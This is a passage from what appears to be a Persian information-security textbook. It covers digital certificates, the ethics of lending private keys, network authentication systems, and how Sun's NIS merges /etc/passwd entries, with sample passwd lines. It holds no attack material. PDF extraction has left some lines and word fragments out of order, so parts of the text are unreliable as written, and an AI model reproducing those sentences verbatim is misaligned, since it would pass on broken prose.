‫ﻛﻨﻨﺪ‪ .‬ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺍﻓﺮﺍﺩ ﺷﻤﺎﺭﻩﻫﺎﻱ ﺍﻣﻨﻴﺖ ﺍﺟﺘﻤﺎﻋﻲ ﺧﻮﺩ ﺭﺍ ﺗﻌﻤﺪﹰﺍ ﻧﺎﺩﺭﺳﺖ ﻣﻲﮔﻮﻳﻨﺪ ﻭ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﻧﻴﺰ ﺁﻧﻬﺎ ﺭﺍ ﺍﺷﺘﺒﺎﻩ ﺗﺎﻳﭗ ﻣـﻲﻛﻨﻨـﺪ؛‬
‫ﺍﻣﺎ ﺑﺎ ﻭﺟﻮﺩ ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﭼﻨﻴﻦ ﺍﺧﺘﻴﺎﺭﻱ ﺍﺯ ﺍﻓﺮﺍﺩ ﺳﻠﺐ ﺷﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﻻ ﺍﻳﻦ ﺭﻭﻧﺪ ﺑـﺪﻟﻴﻞ ﻋـﺪﻡ ﺗﻄﺒﻴـﻖ ﺷـﻤﺎﺭﻩﻫـﺎ ﺑـﻪ‬
‫ﺍﻣﺮﻭﺯ ﻭﻗﺘﻲ ﺩﻭ ﺷﺮﻛﺖ ﺳﻌﻲ ﻣﻲﻛﻨﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺷﻨﺎﺳﺎﻳﻲ ﻓﺮﺩﻱ ﺭﺍ ﺗﻄﺒﻴﻖ ﺩﻫﻨﺪ‪ ،‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﺸﻜﻞ ﺑﺮﺧﻮﺭﺩ ﻣﻲﻛﻨﺪ‪ .‬ﮔﻮﺍﻫﻲﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺑﺪﻟﻴﻞ ﻧﻮﻉ ﻃﺮﺍﺣﻲ ﺧﻮﺩ ﺍﻳﻦ ﺭﻭﻧﺪ ﺭﺍ ﺳﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭﻧﺘﻴﺠـﻪ ﺍﺣﺘﻤـﺎﻝ ﺳـﺎﺧﺘﻦ ﺑﺎﻧﻜﻬـﺎﻱ‬
‫ﺍﻃﻼﻋﺎﺗﻲ ﺑﺰﺭﮒ ﺍﻃﻼﻋﺎﺕ ﻓﺮﺩﻱ ﺗﺠﻤﻴﻊ ﺷﺪﻩ ﺍﺯ ﻣﻨﺎﺑﻊ ﻣﺘﻌﺪﺩ ﺍﻓﺰﺍﻳﺶ ﻣﻲﻳﺎﺑﺪ‪.‬‬

‫ﭼﮕﻮﻧﻪ ﻳﻚ ﻛﻠﻴﺪ ﺭﺍ ﻗﺮﺽ ﻣﻲﺩﻫﻴﺪ‬


‫ﻓﺮﺽ ﻛﻨﻴﺪ ﺷﻤﺎ ﺩﺭ ﺑﻴﻤﺎﺭﺳﺘﺎﻥ ﻣﺮﻳﺾ ﻫﺴﺘﻴﺪ ﻭ ﺍﺯ ﺩﻭﺳﺘﺘﺎﻥ "ﻛﺎﺭﻝ" ﻣﻲﺧﻮﺍﻫﻴﺪ ﺑﻪ ﺩﻓﺘﺮﺗﺎﻥ ﺑﺮﻭﺩ ﻭ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺷﻤﺎ ﺭﺍ ﺑﻴـﺎﻭﺭﺩ‪.‬‬
‫ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺎﻳﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻭ ﺑﺪﻫﻴﺪ‪ .‬ﺁﻳﺎ ﺷﻤﺎ ﺑﺎﻳﺪ ﺍﻳﻨﻜﺎﺭ ﺭﺍ ﺍﻧﺠﺎﻡ ﺩﻫﻴﺪ؟ ﺁﻳﺎ ﺑﻌﺪ ﺍﺯ ﺍﻳﻨﻜﻪ ﻛﺎﺭ ﺍﻧﺠﺎﻡ ﺷﺪ‪ ،‬ﺷﻤﺎ ﺑﺎﻳـﺪ‬
‫ﻛﻠﻴﺪ ﺧﻮﺩ ﺭﺍ ﺑﺎﻃﻞ ﻛﻨﻴﺪ؟ ﻓﺮﺽ ﻛﻨﻴﺪ ﻳﻜﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺑﺎ ﻗﺴﻤﺘﻲ ﺍﺯ ﻳﻚ ﻧﺮﻡﺍﻓـﺰﺍﺭ ﻣـﺸﻜﻞ ﺩﺍﺭﺩ‪ .‬ﻭﻗﺘـﻲ ﺍﺯ ﻛﻠﻴـﺪ ﺧـﺼﻮﺻﻲ ‪ A‬ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﺪ ﺑﺎ ﻣﺸﻜﻞ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﻭﻗﺘﻲ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ‪ B‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻧﻤﺎﻳﺪ ﺑﺎ ﻣﺸﻜﻠﻲ ﻣﻮﺍﺟﻪ ﻧﻤﻲﺷﻮﺩ‪ .‬ﺁﻳﺎ ﺍﺯ ﻟﺤﺎﻅ ﻗﺎﻧﻮﻧﻲ ﺍﻭ ﺑﺎﻳﺪ‬
‫ﺍﺟﺎﺯﻩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ‪ A‬ﺭﺍ ﺑﻪ ﺗﻮﺳﻌﻪﺩﻫﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭ ﺑﺪﻫﺪ ﺗﺎ ﺁﻧﻬﺎ ﺑﺘﻮﺍﻧﻨﺪ ﺑﻔﻬﻤﻨﺪ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﭼﻪ ﺍﺷﻜﺎﻟﻲ‬
‫ﺩﺍﺭﺩ؟ ﻳﺎ ﺍﻭ ﺑﺎ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺟﺎﻣﻌﻴﺖ ﺯﻳﺮﺳﺎﺧﺖ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺭﺍ ﺑﻪ ﻣﺨﺎﻃﺮﻩ ﻧﻤﻲﺍﻧﺪﺍﺯﺩ؟‬
‫ﺣﺎﻝ ﻓﺮﺽ ﻛﻨﻴﺪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻓﺮﺩ ﺧﺎﺻﻲ ﻧﻴﺴﺖ‪ ،‬ﻭ ﻣﺮﺑﻮﻁ ﺑﻪ ﻧﻘﺸﻲ ﺍﺳﺖ ﻛﻪ ﻭﻱ ﺩﺭ ﻳﻚ ﺷﺮﻛﺖ ﺑﺮ ﻋﻬـﺪﻩ ﺩﺍﺭﺩ‪ .‬ﺑﻌﻨـﻮﺍﻥ‬
‫ﻣﺜﺎﻝ ﻳﻚ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﺑﮕﻴﺮﻳﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﻣﻀﺎﻱ ﺳﻔﺎﺭﺷﺎﺕ ﺧﺮﻳﺪ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪ .‬ﺁﻳﺎ ﺩﺭﺳـﺖ ﺍﺳـﺖ ﻛـﻪ ﺩﻭ ﻧﻔـﺮ ﺁﻥ‬
‫ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﺭﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ؟ ﻳﺎ ﺁﻥ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﺩﻭ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ‪ -‬ﻳﻚ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﻫﺮﻳﻚ ﺍﺯ ﻛﺴﺎﻧﻲ ﻛﻪ ﺑﺎﻳﺪ ﺳﻔﺎﺭﺷـﺎﺕ ﺧﺮﻳـﺪ ﺭﺍ‬
‫ﺍﻣﻀﺎ ﻛﻨﻨﺪ ‪ -‬ﺑﺴﺎﺯﺩ؟‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺩﺭ ﺷﺒﻜﻪ‬


‫ﺑﺮﺍﻱ ﺣﻞ ﻣﺸﻜﻞ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﻛﺎﺭﺑﺮ ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﭼﻨﺪ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﺘﺼﻞ ﺑﻪ ﻫﻢ ﺍﺯ ﻃﺮﻳﻖ ﻳـﻚ ﺷـﺒﻜﺔ ﻧـﺎﻣﻄﻤﺌﻦ ﻭ‬
‫ﻻ ﻧﺎﺍﻣﻦ ﺩﺭ ﺩﺳﺘﺮﺱ ﻛﺎﺭﺑﺮﺍﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﺭﺍﻩﺣﻠﻬﺎﻱ ﺯﻳﺎﺩﻱ ﭘﻴﺸﻨﻬﺎﺩ ﺷﺪﻩ ﺍﺳﺖ‪ .‬ﺑﺮﺍﻱ ﺳﺎﺩﮔﻲ ﺗﺮﺟﻴﺢ ﻣـﻲﺩﻫـﻴﻢ ﺍﻃﻼﻋـﺎﺕ ﺣـﺴﺎﺏ‬
‫ﺍﺣﺘﻤﺎ ﹰ‬
‫ﻛﺎﺭﺑﺮﻱ ﻛﺎﺭﺑﺮ ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺮﻛﺰﻱ ﺫﺧﻴﺮﻩ ﺷﻮﺩ‪ ،‬ﺍﻣﺎ ﺑﺮﺍﻱ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﻢ ﺍﻃﻼﻋﺎﺕ ﺁﻥ ﺳﺮﻭﻳﺲﺩﻫﻨـﺪﺓ‬
‫ﻣﺮﻛﺰﻱ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﺩﻳﮕﺮ ﺑﺼﻮﺭﺕ ﺑﻼﺩﺭﻧﮓ ﺫﺧﻴﺮﻩ ﺷﻮﺩ‪ .‬ﺑﺪﻟﻴﻞ ﻣﻼﺣﻈﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺍﺳﺖ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﺯﻣﺎﻧﻴﻜـﻪ ﻛـﺎﺭﺑﺮ‬
‫ﻭﺍﺭﺩ ﻳﻚ ﺍﻳﺴﺘﮕﺎﻩ ﻛﺎﺭﻱ ﻣﻲﺷﻮﺩ‪ ،‬ﻫﻮﻳﺘﺶ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻃﻼﻋﺎﺕ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺮﻛـﺰﻱ ﻭ ﺑـﺪﻭﻥ ﺍﻓـﺸﺎﻱ ﺍﻃﻼﻋـﺎﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﺭﻭﻱ‬
‫ﺷﺒﻜﺔ ﻧﺎﻣﻄﻤﺌﻦ ﺗﺼﺪﻳﻖ ﻣﻲﺷﻮﺩ‪ .‬ﺍﮔﺮﭼﻪ ﺑﺮﺍﻱ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﺍﻩﺣﻠﻬﺎﻳﻲ ‪ -‬ﻣﺜﻞ ‪ ،Kerberos ،NIS+ ،NIS‬ﻭ ‪ - LDAP‬ﺍﺭﺍﺋﻪ ﺷﺪﻩ‪ ،‬ﺍﻣـﺎ‬
‫ﻫﻴﭽﻴﻚ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﻭ ﺑﺼﻮﺭﺕ ﻗﻄﻌﻲ ﭘﺬﻳﺮﻓﺘﻪ ﻧﺸﺪﻩﺍﻧﺪ‪ NIS .‬ﻭ ‪ NIS+‬ﺍﺑﺘﺪﺍ ﺩﺭ ﻣﺤﻴﻄﻬـﺎﻳﻲ ﺑـﺎ ﭼﻨـﺪﻳﻦ ﺍﻳـﺴﺘﮕﺎﻩ ﻛـﺎﺭﻱ ‪Unix‬‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﺪﻧﺪ؛ ﻭ ‪ Kerberos‬ﻭ ‪ LDAP‬ﻧﻴﺰ ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﺤﻴﻄﻬﺎ ﻗﺴﻤﺖ ﻣﻬﻤﻲ ﺍﺯ ﺳﻴﺴﺘﻢﻋﺎﻣﻠﻬﺎﻱ ﻣﺒﺘﻨﻲ ﺑـﺮ ‪Windows NT‬‬
‫ﺭﺍ ﺗﺸﮑﻴﻞ ﻣﻲﺩﻫﻨﺪ‪.‬‬
‫‪٣٢٩‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﺧﺪﻣﺎﺕ ﺍﻃﻼﻋﺎﺕ ﺷﺒﻜﻪﺍﻱ ‪SUN‬‬


‫‪١٥٣‬‬
‫ﺷـﺮﻛﺖ ‪Sun‬‬ ‫ﻳﻜﻲ ﺍﺯ ﻗﺪﻳﻤﻲﺗﺮﻳﻦ ﻭ ﻣﺸﻬﻮﺭﺗﺮﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻫﺒﺮﻱ ﺗﻮﺯﻳﻊﺷﺪﺓ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩ‪ ،‬ﺧـﺪﻣﺎﺕ ﺍﻃﻼﻋـﺎﺕ ﺷـﺒﻜﻪﺍﻱ )‪(NIS‬‬
‫ﺍﺳﺖ‪ .‬ﭼﻨﺪ ﺳﺎﻝ ﺑﻌﺪ ‪ NIS+‬ﻋﺮﺿﻪ ﺷﺪ‪ ،‬ﻛﻪ ﻧﻮﻉ ﺑﻬﺒﻮﺩ ﻳﺎﻓﺘﻪ ﻭ ﺍﻟﺒﺘﻪ ﭘﻴﭽﻴﺪﻩﺗﺮ ‪ NIS‬ﺍﺳﺖ‪ .‬ﻛﻤﻲ ﺍﺧﻴﺮﺗﺮ ﺳـﺮﻭﻳﺲﺩﻫﻨـﺪﻩﻫـﺎﻱ ‪LDAP‬‬
‫)ﭘﺮﻭﺗﻜﻞ ﺳﺒﻚﻭﺯﻥ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺩﺍﻳﺮﻛﺘﻮﺭﻱ(‪ ١٥٤‬ﻣﺤﺒﻮﺑﻴﺖ ﺑﻴﺸﺘﺮﻱ ﭘﻴﺪﺍ ﻛﺮﺩ‪ ،‬ﻭ ﻫﻢﺍﻛﻨﻮﻥ ﻛﺎﺭﺑﺮﺍﻥ ‪ Sun‬ﺑﻪ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨـﻲ ﺑـﺮ ‪ LDAP‬ﺭﻭﻱ‬
‫ﻣﻲﺁﻭﺭﻧﺪ‪ .‬ﺑﺎ ﺍﻳﻨﻜﻪ ‪ Sun‬ﺑﺪﻻﻳﻞ ﺍﻣﻨﻴﺘﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﺧﻮﺩ ﺧﻮﺍﺳﺖ ﮐﻪ ﺍﺯ ‪ NIS‬ﺍﺳﺘﻔﺎﺩﻩ ﻧﻜﻨﻨـﺪ‪ ،‬ﺍﻣـﺎ ﻫﻨـﻮﺯ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺤﻴﻄﻬـﺎ ﺍﺯ ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫‪ NIS‬ﻳﻚ ﺳﻴﺴﺘﻢ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﺍﻱ ﺗﻮﺯﻳﻊﺷﺪﻩ ﺍﺳﺖ ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﭼﻨﺪﻳﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺘﻮﺍﻧﻨﺪ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰ ﻋﺒﻮﺭ‪ ،‬ﻓﺎﻳﻠﻬﺎﻱ ﮔﺮﻭﻩ‪ ،‬ﺟـﺪﺍﻭﻝ‬
‫ﻣﻴﺰﺑﺎﻧﻬﺎ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﺩﻳﮕﺮ ﺩﺭ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﻫﺮﭼﻨﺪ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻓﺎﻳﻠﻬﺎ ﺭﻭﻱ ﻫﺮﻳﻚ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺣﻘﻴﻘﺖ ﺗﻨﻬﺎ ﺩﺭ‬
‫ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﺷﺪﻩﺍﻧﺪ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ‪ NIS‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ )ﻭ ﺍﺣﺘﻤﺎ ﹰﻻ ﺭﻭﻱ ﻳﻚ ﭘﺸﺘﻴﺒﺎﻥ ﻳﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺩﻭﻡ ﺗﻜـﺮﺍﺭ ﺷـﺪﻩ ﺍﺳـﺖ(‪.‬‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﺷﺒﻜﻪ ‪ -‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎﻱ‪ - NIS‬ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﻩﻫﺎﻳﻲ ﻛﻪ ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺍﺻﻠﻲ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩﺍﻧـﺪ )ﻣﺜـﻞ‬
‫ﻓﺎﻳﻠﻬﺎﻱ ﺭﻣﺰﻫﺎﻱ ﻋﺒـﻮﺭ( ﺑﮕﻮﻧﻪﺍﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻛﻪ ﮔﻮﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺑﺼﻮﺭﺕ ﻣﺤﻠﻲ ﺫﺧﻴـﺮﻩ ﺷـﺪﻩ ﺍﺳـﺖ‪ .‬ﺍﻳـﻦ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﻩ ﻧﮕﺎﺷـﺘﻬﺎﻱ‬
‫‪ ١٥٥NIS‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ‪.‬‬
‫ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ NIS‬ﻳﻚ ﺷﺒﻜﺔ ﺑﺰﺭﮒ ﺁﺳﺎﻧﺘﺮ ﺍﺩﺍﺭﻩ ﻣﻲﺷﻮﺩ‪ ،‬ﭼﻮﻥ ﺗﻤﺎﻡ ﺍﻃﻼﻋﺎﺕ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻭ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺭﻭﻱ ﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺫﺧﻴـﺮﻩ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺭﻭﻱ ﻫﻤﺔ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺷﺒﻜﻪ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪.‬‬
‫ﺑﻌﻀﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎ ﺩﺭ ﻧﮕﺎﺷﺘﻬﺎﻱ ‪ NIS‬ﺑﺎ ﻓﺎﻳﻠﻬﺎﻱ ﻣﺘﻨﺎﻇﺮ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺑﻪ ﺩﺍﺩﻩﻫﺎﻳﺸﺎﻥ ﺍﻓﺰﻭﺩﻩ ﻣﻲﮔﺮﺩﺩ‪ .‬ﺩﺭ ﻣﻮﺭﺩ‬
‫ﺍﻳﻦ ﻓﺎﻳﻠﻬﺎ ‪ NIS‬ﺍﺯ ﻋﻼﻣﺖ ﺟﻤﻊ )‪ (+‬ﺑﺮﺍﻱ ﺍﻋﻼﻡ ﺗﻮﻗﻒ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺍﻧﺪﻥ ﻓﺎﻳﻞ ﺑﻪ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ )ﻣﺜ ﹰﻼ ‪ (/etc/passwd‬ﻭ ﺳـﭙﺲ‬
‫ﻻ ﭼﻨﺪﻳﻦ ﻧﮕﺎﺷﺖ‬ ‫ﭘﺮﺱ ﻭ ﺟﻮ ﺍﺯ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ‪ NIS‬ﺭﺍ ﺍﺯ ﻳﻚ ﻧﮕﺎﺷﺖ ﻣﻨﺎﺳﺐ ‪) NIS‬ﻣﺜﻞ ‪ (passwd‬ﺁﻏﺎﺯ ﻣﻲﻛﻨﺪ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﺭﺍ ﺑﺮ ﺍﺳﺎﺱ ﻳﻜﻲ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﺷﺎﺧﺔ ‪ /etc‬ﻣﺜﻞ ‪ ،/etc/hosts ،/etc/passwd‬ﻭ ‪ /etc/services‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﻣـﻲﻛﻨـﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺩﺭ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺍﻳﻦ ﺻﻮﺭﺕ ﺩﻳﺪﻩ ﺷﻮﺩ‪:‬‬

‫‪root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh‬‬
‫‪+:: 999:999:::‬‬
‫ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺑﺮﻧﺎﻣﻪ‪ ،‬ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﺍ ﺍﺯ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺨﻮﺍﻧﺪ ﺗـﺎ ﻳـﻚ ﺩﺭﺧﻮﺍﺳـﺖ ﺷـﺒﻜﻪ ﺑـﺮﺍﻱ ﺧﻮﺍﻧـﺪﻩﺷـﺪﻥ‬
‫ﻻ ﻧﮕﺎﺷﺖ ‪ passwd‬ﺍﺯ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺳـﺎﺧﺘﻪ‬ ‫ﻧﮕﺎﺷﺖ ‪ passwd‬ﺭﻭﻱ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪ .‬ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻫﺮﭼﻨﺪ ﻫﻤﻴﺸﻪ ﺍﻳﻨﻄﻮﺭ ﻧﻴﺴﺖ‪ .‬ﻭﻗﺘﻲ ‪ NIS‬ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺭﺍ ﺑﺮﺭﺳﻲ ﻣﻲﻛﻨﺪ‪ ،‬ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺍﻭﻟﻴﻦ ﺧﻂ ﻗﺎﺑﻞ ﺗﻄﺒﻴﻖ ﺑﺮﺳـﺪ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻛﺎﺭ ﺭﺍ ﻣﺘﻮﻗﻒ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪ .‬ﻣﻲﺗﻮﺍﻧﻴﺪ ﻋﻤﻠﻴﺎﺕ ﺩﺭﻳﺎﻓﺖ ﺣﺴﺎﺑﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺭﺍ ﺑﺎ ﺍﺿﺎﻓﻪ ﻛﺮﺩﻥ ﻳﻚ ﺷﻨﺎﺳﺔ ﻛﺎﺭﺑﺮﻱ ﺑﻪ ﺑﻌﺪ ﺍﺯ ﻋﻼﻣﺖ "‪ "+‬ﺑﻪ‬
‫ﺗﻌﺪﺍﺩ ﺧﺎﺻﻲ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺤﺪﻭﺩ ﻛﻨﻴﺪ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺷﻨﺎﺳﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﻱ ﺧﺎﺻﻲ ﺭﺍ ﺑﺎ ﮔﺬﺍﺷﺘﻦ ﺧﻄﻲ ﻛـﻪ ﺑـﺎ ﻋﻼﻣـﺖ ﺗﻔﺮﻳـﻖ )‪(-‬‬
‫ﺷﺮﻭﻉ ﻣﻲﺷﻮﺩ ﺍﺯ ﺩﺭﻳﺎﻓﺖ ﻛﺮﺩﻥ ﻣﺴﺘﺜﻨﻲ ﻛﻨﻴﺪ‪.‬‬
‫‪ NIS‬ﻫﻤﭽﻨﻴﻦ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﺳﺎﺯﺩ ﻛﻪ ﺑﺼﻮﺭﺕ ﺍﻧﺘﺨﺎﺑﻲ ﺑﻌﻀﻲ ﺩﺍﻣﻨـﻪﻫـﺎ ﺭﺍ ﺍﺯ ﺑﺮﺧـﻲ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﺩﺍﺩﺓ ‪ /etc/passwd‬ﻭﺍﺭﺩ ﻛﻨﻴـﺪ‪.‬‬
‫ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ‪ ،‬ﺍﮔﺮ ﺩﺍﺩﺓ ﺯﻳﺮ ﺭﺍ ﺩﺭ ﻓﺎﻳﻞ ‪ /etc/passwd‬ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ‪:‬‬

‫‪root:si4NOjF9Q8JpE:0:Mr. Root:/:/bin/sh‬‬
‫‪+:‘:999:999:::‬‬
‫ﺁﻧﮕﺎﻩ ﻛﻠﻴﺔ ﺩﺍﺩﻩﻫﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﻧﮕﺎﺷﺖ ‪ passwd‬ﻣﺮﺑﻮﻁ ﺑﻪ ‪ NIS‬ﻭﺍﺭﺩ ﺧﻮﺍﻫﻨﺪ ﺷﺪ‪ ،‬ﺍﻣﺎ ﻫﺮﻳﻚ ﺩﺍﺭﺍﻱ ﺩﺍﺩﺓ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺧـﻮﺩ‬
‫ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ ﻛﻪ ﺑﺎ "*" ﺟﺎﻳﮕﺰﻳﻦ ﺷﺪﻩ ﻭ ﺍﺯ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺁﻥ ﺩﺭ ﻣﺎﺷﻴﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺟﻠﻮﮔﻴﺮﻱ ﻣﻲﻛﻨـﺪ‪ .‬ﻫﻤـﺔ ‪UID‬ﻫـﺎ ﻭ‬

‫‪153 Network Information Service‬‬


